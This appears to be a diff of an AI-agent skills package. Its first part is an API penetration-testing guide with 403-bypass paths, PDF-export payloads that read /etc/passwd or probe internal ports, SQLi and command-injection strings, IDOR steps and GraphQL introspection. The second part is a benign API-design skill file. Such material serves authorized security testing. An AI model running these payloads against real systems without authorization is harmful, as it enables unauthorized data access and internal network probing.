+| clairvoyance | Schema reconstruction |
+| InQL | Burp extension |
+| GraphQLmap | Exploitation |
+---
+## Endpoint Bypass Techniques
+When receiving 403/401, try these bypasses:
+```bash
+# Original blocked request
+/api/v1/users/sensitivedata → 403
+# Bypass attempts
+/api/v1/users/sensitivedata.json
+/api/v1/users/sensitivedata?
+/api/v1/users/sensitivedata/
+/api/v1/users/sensitivedata??
+/api/v1/users/sensitivedata%20
+/api/v1/users/sensitivedata%09
+/api/v1/users/sensitivedata#
+/api/v1/users/sensitivedata&details
+/api/v1/users/..;/sensitivedata
+```
+---
+## Output Exploitation
+### PDF Export Attacks
+```html
+<!-- LFI via PDF export -->
+<iframe src="file:///etc/passwd" height=1000 width=800>
+<!-- SSRF via PDF export -->
+<object data="http://127.0.0.1:8443"/>
+<!-- Port scanning -->
+<img src="http://127.0.0.1:445"/>
+<!-- IP disclosure -->
+<img src="https://iplogger.com/yourcode.gif"/>
+```
+### DoS via Limits
+```bash
+# Normal request
+/api/news?limit=100
+# DoS attempt
+/api/news?limit=9999999999
+```
+---
+## Common API Vulnerabilities Checklist
+| Vulnerability | Description |
+|---------------|-------------|
+| API Exposure | Unprotected endpoints exposed publicly |
+| Misconfigured Caching | Sensitive data cached incorrectly |
+| Exposed Tokens | API keys/tokens in responses or URLs |
+| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
+| IDOR / BOLA | Broken Object Level Authorization |
+| Undocumented Endpoints | Hidden admin/debug endpoints |
+| Different Versions | Security gaps in older API versions |
+| Rate Limiting | Missing or bypassable rate limits |
+| Race Conditions | TOCTOU vulnerabilities |
+| XXE Injection | XML parser exploitation |
+| Content Type Issues | Switching between JSON/XML |
+| HTTP Method Tampering | GET→DELETE/PUT abuse |
+---
+## Quick Reference
+| Vulnerability | Test Payload | Risk |
+|---------------|--------------|------|
+| IDOR | Change user_id parameter | High |
+| SQLi | `' OR 1=1--` in JSON | Critical |
+| Command Injection | `; ls /` | Critical |
+| XXE | DOCTYPE with ENTITY | High |
+| SSRF | Internal IP in params | High |
+| Rate Limit Bypass | Batch requests | Medium |
+| Method Tampering | GET→DELETE | High |
+---
+## Tools Reference
+| Category | Tool | URL |
+|----------|------|-----|
+| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
+| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
+| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
+| API Security | apicheck | github.com/BBVA/apicheck |
+| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
+| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
+| API Toolkit | APIKit | github.com/API-Security/APIKit |
+| API Keys | API Guesser | api-guesser.netlify.app |
+| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
+| GraphQL | InQL | github.com/doyensec/inql |
+| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
+| GraphQL | graphw00f | github.com/dolevf/graphw00f |
+| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
+| GraphQL | batchql | github.com/assetnote/batchql |
+| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
+| Wordlists | SecLists | github.com/danielmiessler/SecLists |
+| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
+| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
+| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
+| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |
+---
+## Constraints
+**Must:**
+- Test mobile, web, and developer APIs separately
+- Check all API versions (/v1, /v2, /v3)
+- Validate both authenticated and unauthenticated access
+**Must Not:**
+- Assume same security controls across API versions
+- Skip testing undocumented endpoints
+- Ignore rate limiting checks
+**Should:**
+- Add `X-Requested-With: XMLHttpRequest` header to simulate frontend
+- Check archive.org for historical API endpoints
+- Test for race conditions on sensitive operations
+---
+## Examples
+### Example 1: IDOR Exploitation
+```bash
+# Original request (own data)
+GET /api/v1/invoices/12345
+Authorization: Bearer <token>
+# Modified request (other user's data)
+GET /api/v1/invoices/12346
+Authorization: Bearer <token>
+# Response reveals other user's invoice data
+```
+### Example 2: GraphQL Introspection
+```bash
+curl -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query":"{__schema{types{name,fields{name}}}}"}'
+```
+---
+## Troubleshooting
+| Issue | Solution |
+|-------|----------|
+| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |
+| 401 on all endpoints | Try adding `?user_id=1` parameter |
+| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
+| Rate limited | Use IP rotation or batch requests |
+| Can't find endpoints | Check Swagger, archive.org, JS files |

package/skills/api-patterns/SKILL.md ADDED Viewed

@@ -0,0 +1,81 @@
+---
+name: api-patterns
+description: API design principles and decision-making. REST vs GraphQL vs tRPC selection, response formats, versioning, pagination.
+allowed-tools: Read, Write, Edit, Glob, Grep
+---
+# API Patterns
+> API design principles and decision-making for 2025.
+> **Learn to THINK, not copy fixed patterns.**
+## 🎯 Selective Reading Rule
+**Read ONLY files relevant to the request!** Check the content map, find what you need.
+---
+## 📑 Content Map
+| File | Description | When to Read |
+|------|-------------|--------------|
+| `api-style.md` | REST vs GraphQL vs tRPC decision tree | Choosing API type |
+| `rest.md` | Resource naming, HTTP methods, status codes | Designing REST API |
+| `response.md` | Envelope pattern, error format, pagination | Response structure |
+| `graphql.md` | Schema design, when to use, security | Considering GraphQL |
+| `trpc.md` | TypeScript monorepo, type safety | TS fullstack projects |
+| `versioning.md` | URI/Header/Query versioning | API evolution planning |
+| `auth.md` | JWT, OAuth, Passkey, API Keys | Auth pattern selection |
+| `rate-limiting.md` | Token bucket, sliding window | API protection |
+| `documentation.md` | OpenAPI/Swagger best practices | Documentation |
+| `security-testing.md` | OWASP API Top 10, auth/authz testing | Security audits |
+---
+## 🔗 Related Skills
+| Need | Skill |
+|------|-------|
+| API implementation | `@[skills/backend-development]` |
+| Data structure | `@[skills/database-design]` |
+| Security details | `@[skills/security-hardening]` |
+---
+## ✅ Decision Checklist
+Before designing an API:
+- [ ] **Asked user about API consumers?**
+- [ ] **Chosen API style for THIS context?** (REST/GraphQL/tRPC)
+- [ ] **Defined consistent response format?**
+- [ ] **Planned versioning strategy?**
+- [ ] **Considered authentication needs?**
+- [ ] **Planned rate limiting?**
+- [ ] **Documentation approach defined?**
+---
+## ❌ Anti-Patterns
+**DON'T:**
+- Default to REST for everything
+- Use verbs in REST endpoints (/getUsers)
+- Return inconsistent response formats
+- Expose internal errors to clients
+- Skip rate limiting
+**DO:**
+- Choose API style based on context
+- Ask about client requirements
+- Document thoroughly
+- Use appropriate status codes
+---
+## Script
+| Script | Purpose | Command |
+|--------|---------|---------|
+| `scripts/api_validator.py` | API endpoint validation | `python scripts/api_validator.py <project_path>` |